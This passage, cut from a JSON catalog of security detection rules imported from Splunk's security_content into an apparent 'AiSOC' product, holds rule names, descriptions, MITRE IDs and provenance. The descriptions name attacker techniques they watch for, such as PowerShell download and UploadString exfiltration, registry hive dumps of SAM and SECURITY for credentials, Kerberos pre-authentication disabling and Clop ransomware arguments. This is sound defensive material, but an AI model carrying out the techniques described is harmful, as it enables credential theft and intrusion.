If confirmed malicious, this behavior could lead to network mapping, lateral movement, and potential compromise of additional systems within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/download-files-using-telegram.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58194e28-ae5e-11eb-8912-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/download_files_using_telegram.yml" } }, { "id": "splunk-security-content-583c5de3-7709-44cb-abfc-0e828d301b59", "type": "detection", "name": "O365 SharePoint Malware Detection", "description": "The following analytic identifies when a malicious file is detected within the SharePoint Online ecosystem. Attackers may stage and execute malicious files from within the Microsoft Office 365 ecosystem. Any detections from built-in Office 365 capabilities should be monitored and responded to appropriately. 
Certain premium Office 365 capabilities further enhance these detection and response functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-sharepoint-malware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "583c5de3-7709-44cb-abfc-0e828d301b59", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_sharepoint_malware_detection.yml" } }, { "id": "splunk-security-content-583e8a68-f2f7-45be-8fc9-bf725f0e22fd", "type": "detection", "name": "Active Directory Privilege Escalation Identified", "description": "The following analytic identifies potential privilege escalation activities within an organization's Active Directory (AD) environment. It detects this activity by correlating multiple analytics from the Active Directory Privilege Escalation analytic story within a specified time frame. This is significant for a SOC as it helps identify coordinated attempts to gain elevated privileges, which could indicate a serious security threat. 
If confirmed malicious, this activity could allow attackers to gain unauthorized access to sensitive systems and data, leading to potential data breaches and further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/active-directory-privilege-escalation-identified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "583e8a68-f2f7-45be-8fc9-bf725f0e22fd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/active_directory_privilege_escalation_identified.yml" } }, { "id": "splunk-security-content-584f4884-0bf1-11ec-a5ec-acde48001122", "type": "detection", "name": "Get-ForestTrust with PowerShell", "description": "The following analytic detects the execution of the Get-ForestTrust command via PowerShell, commonly used by adversaries to gather domain trust information. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. Identifying this activity is crucial as it indicates potential reconnaissance efforts to map out domain trusts, which can inform further attacks. 
If confirmed malicious, this activity could allow attackers to understand domain relationships, aiding in lateral movement and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-foresttrust-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "584f4884-0bf1-11ec-a5ec-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_foresttrust_with_powershell.yml" } }, { "id": "splunk-security-content-5890ba10-4e48-4dc0-8a40-3e1ebe75e737", "type": "detection", "name": "Linux Auditd Base64 Decode Files", "description": "The following analytic detects suspicious Base64 decode operations that may indicate malicious activity, such as data exfiltration or execution of encoded commands. Base64 is commonly used to encode data for safe transmission, but attackers may abuse it to conceal malicious payloads. This detection focuses on identifying unusual or unexpected Base64 decoding processes, particularly when associated with critical files or directories. 
By monitoring these activities, the analytic helps uncover potential threats, enabling security teams to respond promptly and mitigate risks associated with encoded malware or unauthorized data access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-base64-decode-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5890ba10-4e48-4dc0-8a40-3e1ebe75e737", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_base64_decode_files.yml" } }, { "id": "splunk-security-content-58adae9e-8ea3-11ec-90f6-acde48001122", "type": "detection", "name": "Windows Diskshadow Proxy Execution", "description": "The following analytic detects the use of DiskShadow.exe in scripting mode, which can execute arbitrary unsigned code. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions with scripting mode flags. This activity is significant because DiskShadow.exe is typically used for legitimate backup operations, but its misuse can indicate an attempt to execute unauthorized code. 
If confirmed malicious, this could lead to unauthorized code execution, potentially compromising the system and allowing further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-diskshadow-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58adae9e-8ea3-11ec-90f6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_diskshadow_proxy_execution.yml" } }, { "id": "splunk-security-content-58c4e56c-b5b8-46a3-b5fb-6537dca3c6de", "type": "detection", "name": "Windows File Download Via PowerShell", "description": "The following analytic detects the use of PowerShell's download methods such as\n\"DownloadString\" and \"DownloadData\" from the WebClient class or Invoke-WebRequest\nand its aliases \"IWR\" or \"Curl\".\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on\nprocess execution logs that include command-line details.\nThis activity can be significant as such methods and functions are commonly used in malicious\nPowerShell scripts to fetch and execute remote code.\nIf confirmed malicious, this behavior could allow an attacker to download and run\narbitrary code, potentially leading to unauthorized access, data exfiltration,\nor further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": 
[ "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-download-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58c4e56c-b5b8-46a3-b5fb-6537dca3c6de", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_download_via_powershell.yml" } }, { "id": "splunk-security-content-58cea3ec-1f6d-11ec-8560-acde48001122", "type": "detection", "name": "Screensaver Event Trigger Execution", "description": "The following analytic detects modifications to the SCRNSAVE.EXE registry entry, indicating potential event trigger execution via screensaver settings for persistence or privilege escalation. It leverages registry activity data from the Endpoint data model to identify changes to the specified registry path. This activity is significant as it is a known technique used by APT groups and malware to maintain persistence or escalate privileges. 
If confirmed malicious, this could allow an attacker to execute arbitrary code with elevated privileges, leading to further system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/screensaver-event-trigger-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58cea3ec-1f6d-11ec-8560-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/screensaver_event_trigger_execution.yml" } }, { "id": "splunk-security-content-58d270fb-5b39-418e-a855-4b8ac046805e", "type": "detection", "name": "MacOS LOLbin", "description": "The following analytic detects multiple executions of Living off the Land (LOLbin) binaries on macOS within a short period.\nIt leverages osquery to monitor process events and identifies commands such as \"find\", \"crontab\", \"screencapture\", \"openssl\", \"curl\", \"wget\", \"killall\", and \"funzip\". 
This activity is significant as LOLbins are often used by attackers to perform malicious actions while evading detection.\nIf confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-lolbin.yaml", "provenance": { "source": "splunk/security_content", "source_id": "58d270fb-5b39-418e-a855-4b8ac046805e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_lolbin.yml" } }, { "id": "splunk-security-content-58e034de-1f87-4812-9dc3-a4f68c7db930", "type": "detection", "name": "O365 Concurrent Sessions From Different Ips", "description": "The following analytic identifies user sessions in Office 365 accessed from multiple IP addresses, indicating potential adversary-in-the-middle (AiTM) phishing attacks. It detects this activity by analyzing Azure Active Directory logs for 'UserLoggedIn' operations and flags sessions with more than one associated IP address. This behavior is significant as it suggests unauthorized concurrent access, which is uncommon in normal usage. 
If confirmed malicious, the impact could include data theft, account takeover, and the launching of internal phishing campaigns, posing severe risks to organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-concurrent-sessions-from-different-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58e034de-1f87-4812-9dc3-a4f68c7db930", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_concurrent_sessions_from_different_ips.yml" } }, { "id": "splunk-security-content-58eb9f80-896c-42f8-86c6-27ab59026c9c", "type": "detection", "name": "Okta Non-Standard VPN Usage", "description": "Remote Employment Fraud (REF) actors will often use virtual private networks (VPNs) to conceal their true physical location. 
Threat actors mask their originating IP address and instead appear to be situated in any location where the VPN service has a node.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1572", "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-non-standard-vpn-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58eb9f80-896c-42f8-86c6-27ab59026c9c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/okta_non_standard_vpn_usage.yml" } }, { "id": "splunk-security-content-58fcdeb1-728d-415d-b0d7-3ab18a275ec2", "type": "detection", "name": "Windows Command and Scripting Interpreter Path Traversal Exec", "description": "The following analytic detects path traversal command-line execution, often used in malicious documents to execute code via msdt.exe for defense evasion. It leverages Endpoint Detection and Response (EDR) data, focusing on specific patterns in process paths. This activity is significant as it can indicate an attempt to bypass security controls and execute unauthorized code. 
If confirmed malicious, this behavior could lead to code execution, privilege escalation, or persistence within the environment, potentially allowing attackers to deploy malware or leverage other living-off-the-land binaries (LOLBins).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-command-and-scripting-interpreter-path-traversal-exec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58fcdeb1-728d-415d-b0d7-3ab18a275ec2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_command_and_scripting_interpreter_path_traversal_exec.yml" } }, { "id": "splunk-security-content-593854c5-2182-49dd-9f31-18ef697445b9", "type": "detection", "name": "Windows Explorer.exe Spawning PowerShell or Cmd", "description": "This detection identifies instances where Windows Explorer.exe spawns PowerShell or cmd.exe processes, particularly focusing on executions initiated by LNK files. This behavior is associated with the ZDI-CAN-25373 Windows shortcut zero-day vulnerability, where specially crafted LNK files are used to trigger malicious code execution through cmd.exe or powershell.exe. 
This technique has been actively exploited by multiple APT groups in targeted attacks through both HTTP and SMB delivery methods.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-explorer-exe-spawning-powershell-or-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "593854c5-2182-49dd-9f31-18ef697445b9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_explorer_exe_spawning_powershell_or_cmd.yml" } }, { "id": "splunk-security-content-5984dbe8-572f-47d7-9251-3dff6c3f0c0d", "type": "detection", "name": "Kubernetes Cron Job Creation", "description": "The following analytic detects the creation of a Kubernetes cron job, which is a task scheduled to run automatically at specified intervals. It identifies this activity by monitoring Kubernetes Audit logs for the creation events of cron jobs. This behavior is significant for a SOC as it could allow an attacker to execute malicious tasks repeatedly and automatically, posing a threat to the Kubernetes infrastructure. 
If confirmed malicious, this activity could lead to persistent attacks, service disruptions, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-cron-job-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5984dbe8-572f-47d7-9251-3dff6c3f0c0d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_cron_job_creation.yml" } }, { "id": "splunk-security-content-59b0fc85-7a0d-4585-97ec-06a382801990", "type": "detection", "name": "Windows AD Dangerous Group ACL Modification", "description": "This detection monitors the addition of the following ACLs to an Active Directory group object: \"Full control\", \"All extended rights\", \"All validated writes\", \"Create all child objects\", \"Delete all child objects\", \"Delete subtree\", \"Delete\", \"Modify permissions\", \"Modify owner\", and \"Write all properties\". Such modifications can indicate potential privilege escalation or malicious activity. 
Immediate investigation is recommended upon alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dangerous-group-acl-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "59b0fc85-7a0d-4585-97ec-06a382801990", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dangerous_group_acl_modification.yml" } }, { "id": "splunk-security-content-59b51620-94c9-11ec-b3d5-acde48001122", "type": "detection", "name": "Kerberos Pre-Authentication Flag Disabled with PowerShell", "description": "The following analytic detects the use of the `Set-ADAccountControl` PowerShell cmdlet with parameters that disable Kerberos Pre-Authentication. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this specific command execution. Disabling Kerberos Pre-Authentication is significant because it allows adversaries to perform offline brute force attacks against user passwords using the AS-REP Roasting technique. 
If confirmed malicious, this activity could enable attackers to escalate privileges or maintain persistence within an Active Directory environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberos-pre-authentication-flag-disabled-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "59b51620-94c9-11ec-b3d5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberos_pre_authentication_flag_disabled_with_powershell.yml" } }, { "id": "splunk-security-content-59e54602-9680-11ec-a8a6-acde48001122", "type": "detection", "name": "Windows Disable Memory Crash Dump", "description": "The following analytic detects attempts to disable the memory crash dump feature on Windows systems by setting the registry value to 0. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the CrashDumpEnabled registry key. This activity is significant because disabling crash dumps can hinder forensic analysis and incident response efforts. 
If confirmed malicious, this action could be part of a broader attack strategy, such as data destruction or system destabilization, as seen with HermeticWiper, potentially leading to significant operational disruptions and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-memory-crash-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "59e54602-9680-11ec-a8a6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_memory_crash_dump.yml" } }, { "id": "splunk-security-content-59e8bf41-7472-412a-90d3-00f3afa452e9", "type": "detection", "name": "Windows Exfiltration Over C2 Via Powershell UploadString", "description": "The following analytic identifies potential data exfiltration using the PowerShell `net.webclient` command with the `UploadString` method. It leverages PowerShell Script Block Logging to detect instances where this command is executed. This activity is significant as it may indicate an attempt to upload sensitive data, such as desktop screenshots or files, to an external or internal URI, often associated with malware like Winter-Vivern. 
If confirmed malicious, this could lead to unauthorized data transfer, compromising sensitive information and potentially leading to further exploitation of the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-exfiltration-over-c2-via-powershell-uploadstring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "59e8bf41-7472-412a-90d3-00f3afa452e9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_exfiltration_over_c2_via_powershell_uploadstring.yml" } }, { "id": "splunk-security-content-5a2ec401-60bb-474e-b936-1e66e7aa4060", "type": "detection", "name": "Azure AD Service Principal Authentication", "description": "The following analytic identifies authentication events of service principals in Azure Active Directory. It leverages the `azure_monitor_aad` data source, specifically targeting \"Sign-in activity\" within ServicePrincipalSignInLogs. This detection gathers details such as sign-in frequency, timing, source IPs, and accessed resources. Monitoring these events is significant for SOC teams to distinguish between normal application authentication and potential anomalies, which could indicate compromised credentials or malicious activities. 
If confirmed malicious, attackers could gain unauthorized access to resources, leading to data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5a2ec401-60bb-474e-b936-1e66e7aa4060", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_authentication.yml" } }, { "id": "splunk-security-content-5a5351cd-ba7e-499e-ad82-2ce160ffa637", "type": "detection", "name": "Windows Privilege Escalation System Process Without System Parent", "description": "The following analytic detects any system integrity level process spawned by a non-system account. It leverages Sysmon EventID 1, focusing on process integrity and parent user data. This behavior is significant as it often indicates successful privilege escalation to SYSTEM from a user-controlled process or service. 
If confirmed malicious, this activity could allow an attacker to gain full control over the system, execute arbitrary code, and potentially compromise the entire environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1548", "T1134" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-privilege-escalation-system-process-without-system-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5a5351cd-ba7e-499e-ad82-2ce160ffa637", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_privilege_escalation_system_process_without_system_parent.yml" } }, { "id": "splunk-security-content-5a773226-ebd7-480c-a819-fccacfeddcd9", "type": "detection", "name": "GitHub Enterprise Disable 2FA Requirement", "description": "The following analytic detects when two-factor authentication (2FA) requirements are disabled in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for 2FA requirement changes by tracking actor details, organization information, and associated metadata. For a SOC, identifying disabled 2FA requirements is critical as it could indicate attempts to weaken account security controls. Two-factor authentication is a fundamental security control that helps prevent unauthorized access even if passwords are compromised. Disabling 2FA requirements could allow attackers to more easily compromise accounts through password-based attacks. 
The impact of disabled 2FA includes increased risk of account takeover, potential access to sensitive code and intellectual property, and compromise of the software supply chain. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting broader account compromises.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-disable-2fa-requirement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5a773226-ebd7-480c-a819-fccacfeddcd9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_disable_2fa_requirement.yml" } }, { "id": "splunk-security-content-5a83ce44-8e0f-4786-a775-8249a525c879", "type": "detection", "name": "Windows Unsigned DLL Side-Loading", "description": "The following analytic detects the creation of potentially malicious unsigned DLLs in the c:\\windows\\system32 or c:\\windows\\syswow64 folders. It leverages Sysmon EventCode 7 logs to identify unsigned DLLs with unavailable signatures loaded in these critical directories. This activity is significant as it may indicate a DLL hijacking attempt, a technique used by attackers to gain unauthorized access and execute malicious code. 
If confirmed malicious, this could lead to privilege escalation, allowing the attacker to gain elevated privileges and further compromise the target system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unsigned-dll-side-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5a83ce44-8e0f-4786-a775-8249a525c879", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unsigned_dll_side_loading.yml" } }, { "id": "splunk-security-content-5a8a2a72-8322-11eb-9ee9-acde48001122", "type": "detection", "name": "Clop Common Exec Parameter", "description": "The following analytic identifies the execution of CLOP ransomware variants using specific arguments (\"runrun\" or \"temp.dat\") to trigger their malicious activities. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is crucial as it indicates potential ransomware behavior, which can lead to file encryption on network shares or local machines. 
If confirmed malicious, this activity could result in significant data loss and operational disruption due to encrypted files, highlighting the need for immediate investigation and response.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/clop-common-exec-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5a8a2a72-8322-11eb-9ee9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/clop_common_exec_parameter.yml" } }, { "id": "splunk-security-content-5aaff29d-0cce-405b-9ee8-5d06b49d045e", "type": "detection", "name": "Windows Sensitive Registry Hive Dump Via CommandLine", "description": "The following analytic detects the use of `reg.exe` to export Windows Registry hives, which may contain sensitive credentials. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving `save` or `export` actions targeting the `sam`, `system`, or `security` hives. This activity is significant as it indicates potential offline credential access attacks, often executed from untrusted processes or scripts. 
If confirmed malicious, attackers could gain access to credential data, enabling further compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sensitive-registry-hive-dump-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5aaff29d-0cce-405b-9ee8-5d06b49d045e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sensitive_registry_hive_dump_via_commandline.yml" } }, { "id": "splunk-security-content-5aba1860-9617-4af9-b19d-aecac16fe4f2", "type": "detection", "name": "Cloud Provisioning Activity From Previously Unseen Region", "description": "The following analytic detects cloud provisioning activities originating from previously unseen regions. It leverages cloud infrastructure logs to identify events where resources are started or created, and cross-references these with a baseline of known regions. This activity is significant as it may indicate unauthorized access or misuse of cloud resources from unfamiliar locations. 
